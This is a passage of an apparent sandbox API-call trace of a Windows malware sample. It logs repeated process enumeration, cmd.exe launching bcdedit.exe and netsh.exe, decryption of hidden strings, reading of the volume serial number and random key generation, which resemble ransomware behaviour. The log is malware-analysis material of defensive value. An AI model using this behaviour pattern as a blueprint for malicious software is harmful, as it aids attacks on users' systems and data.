pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0153.405] GetLastError () returned 0x12 [0153.406] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.406] GetLastError () returned 0x12 [0153.406] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcdedit.exe")) returned 1 [0153.407] GetLastError () returned 0x12 [0153.407] Process32NextW (in: hSnapshot=0x300, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcdedit.exe")) returned 0 [0153.407] CloseHandle (hObject=0x300) returned 1 [0153.408] Sleep (dwMilliseconds=0x1f4) [0154.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2ec [0154.079] Process32FirstW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.080] GetLastError () returned 0x12 [0154.080] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.080] GetLastError () returned 0x12 [0154.081] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.081] GetLastError () returned 0x12 [0154.081] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.082] GetLastError () returned 0x12 [0154.082] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.082] GetLastError () returned 0x12 [0154.082] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.083] GetLastError () returned 0x12 [0154.083] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.084] GetLastError () returned 0x12 [0154.084] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.085] GetLastError () returned 0x12 [0154.085] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.086] GetLastError () returned 0x12 [0154.086] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0154.086] GetLastError () returned 0x12 [0154.086] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0154.087] GetLastError () returned 0x12 [0154.087] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.088] GetLastError () returned 0x12 [0154.088] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.088] GetLastError () returned 0x12 [0154.088] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.089] GetLastError () returned 0x12 [0154.089] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.089] GetLastError () returned 0x12 [0154.090] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.090] GetLastError () returned 0x12 [0154.090] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.091] GetLastError () returned 0x12 [0154.091] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.091] GetLastError () returned 0x12 [0154.091] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.092] GetLastError () returned 0x12 [0154.092] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.093] GetLastError () returned 0x12 [0154.093] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.093] GetLastError () returned 0x12 [0154.093] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.094] GetLastError () returned 0x12 [0154.094] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.095] GetLastError () returned 0x12 [0154.095] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.095] GetLastError () returned 0x12 [0154.095] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.096] GetLastError () returned 0x12 [0154.096] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.097] GetLastError () returned 0x12 [0154.097] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.097] GetLastError () returned 0x12 [0154.097] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0154.098] GetLastError () returned 0x12 [0154.098] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.099] GetLastError () returned 0x12 [0154.099] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0154.099] GetLastError () returned 0x12 [0154.099] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0154.100] GetLastError () returned 0x12 [0154.100] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0154.101] GetLastError () returned 0x12 [0154.101] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0154.101] GetLastError () returned 0x12 [0154.101] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.102] GetLastError () returned 0x12 [0154.102] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0154.103] GetLastError () returned 0x12 [0154.103] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0154.103] GetLastError () returned 0x12 [0154.103] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0154.104] GetLastError () returned 0x12 [0154.104] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0154.105] GetLastError () returned 0x12 [0154.105] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0154.105] GetLastError () returned 0x12 [0154.105] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0154.106] GetLastError () returned 0x12 [0154.106] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0154.106] GetLastError () returned 0x12 [0154.107] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0154.107] GetLastError () returned 0x12 [0154.107] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0154.108] GetLastError () returned 0x12 [0154.108] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0154.108] GetLastError () returned 0x12 [0154.108] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.109] GetLastError () returned 0x12 [0154.109] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcdedit.exe")) returned 1 [0154.110] GetLastError () returned 0x12 [0154.110] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x580, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0154.110] GetLastError () returned 0x12 [0154.110] Process32NextW (in: hSnapshot=0x2ec, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x580, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 0 [0154.111] CloseHandle (hObject=0x2ec) returned 1 [0154.111] Sleep (dwMilliseconds=0x1f4) Thread: id = 113 os_tid = 0xfcc [0139.892] GetLogicalDrives () returned 0x4 [0139.892] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a04a0 [0139.892] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafda8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafe10 | out: phKey=0x2bafe10*=0xaa91d0) returned 1 [0139.892] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x2bafdf8, dwFlags=0x0) returned 1 [0139.892] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a04a0, pdwDataLen=0x2bafdc4 | out: pbData=0x26a04a0, pdwDataLen=0x2bafdc4) returned 1 [0139.893] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0139.893] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x28) returned 0x26a4ae8 [0139.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x28c [0139.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x290 [0139.893] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a4b18 [0139.893] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafd74, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafddc | out: phKey=0x2bafddc*=0xaa91d0) returned 1 [0139.893] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x2bafdc4, dwFlags=0x0) returned 1 [0139.893] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4b18, pdwDataLen=0x2bafd90 | out: pbData=0x26a4b18, pdwDataLen=0x2bafd90) returned 1 [0139.893] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0139.893] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a4b40 [0139.893] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a89f0 [0139.893] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a8fa0 [0139.893] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafd4c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafdb4 | out: phKey=0x2bafdb4*=0xaa93d0) returned 1 [0139.893] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x2bafd9c, dwFlags=0x0) returned 1 [0139.893] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8fa0, pdwDataLen=0x2bafd68 | out: pbData=0x26a8fa0, pdwDataLen=0x2bafd68) returned 1 [0139.893] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0139.893] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a8fa0 | out: hHeap=0x26a0000) returned 1 [0139.893] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a4b40, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0139.893] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a89f0 | out: hHeap=0x26a0000) returned 1 [0139.893] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4b18 | out: hHeap=0x26a0000) returned 1 [0139.893] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2bafe1c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2bafe1c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.894] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4b40 | out: hHeap=0x26a0000) returned 1 [0139.894] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a04e8 [0139.894] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafcb8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafd20 | out: phKey=0x2bafd20*=0xaa92d0) returned 1 [0139.894] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x2bafd08, dwFlags=0x0) returned 1 [0139.894] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a04e8, pdwDataLen=0x2bafcd4 | out: pbData=0x26a04e8, pdwDataLen=0x2bafcd4) returned 1 [0139.894] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0139.894] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a12e8 [0139.894] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafcb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafd18 | out: phKey=0x2bafd18*=0xaa92d0) returned 1 [0139.894] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x2bafd00, dwFlags=0x0) returned 1 [0139.894] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12e8, pdwDataLen=0x2bafccc | out: pbData=0x26a12e8, pdwDataLen=0x2bafccc) returned 1 [0139.894] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0139.894] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a7f90 [0139.894] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafca8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafd10 | out: phKey=0x2bafd10*=0xaa9010) returned 1 [0139.894] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x2bafcf8, dwFlags=0x0) returned 1 [0139.894] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a7f90, pdwDataLen=0x2bafcc4 | out: pbData=0x26a7f90, pdwDataLen=0x2bafcc4) returned 1 [0139.894] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.894] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a8fa0 [0139.894] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafca0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafd08 | out: phKey=0x2bafd08*=0xaa9010) returned 1 [0139.894] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x2bafcf0, dwFlags=0x0) returned 1 [0139.894] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a8fa0, pdwDataLen=0x2bafcbc | out: pbData=0x26a8fa0, pdwDataLen=0x2bafcbc) returned 1 [0139.894] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.894] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a4b18 [0139.894] CryptImportKey (in: hProv=0xa968b8, pbData=0x2bafc98, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bafd00 | out: phKey=0x2bafd00*=0xaa9050) returned 1 [0139.894] CryptSetKeyParam (hKey=0xaa9050, dwParam=0x1, pbData=0x2bafce8, dwFlags=0x0) returned 1 [0139.894] CryptDecrypt (in: hKey=0xaa9050, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4b18, pdwDataLen=0x2bafcb4 | out: pbData=0x26a4b18, pdwDataLen=0x2bafcb4) returned 1 [0139.894] CryptDestroyKey (hKey=0xaa9050) returned 1 [0139.894] htonl (hostlong=0xb4197730) returned 0x307719b4 [0139.894] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x20, pbBuffer=0x2bafdc8 | out: pbBuffer=0x2bafdc8) returned 1 [0139.894] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x28) returned 0x26a4b30 [0139.895] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a9038 [0139.895] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x4) returned 0x26a4b60 [0139.895] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x14) returned 0x26a9050 [0139.895] RtlAllocateHeap 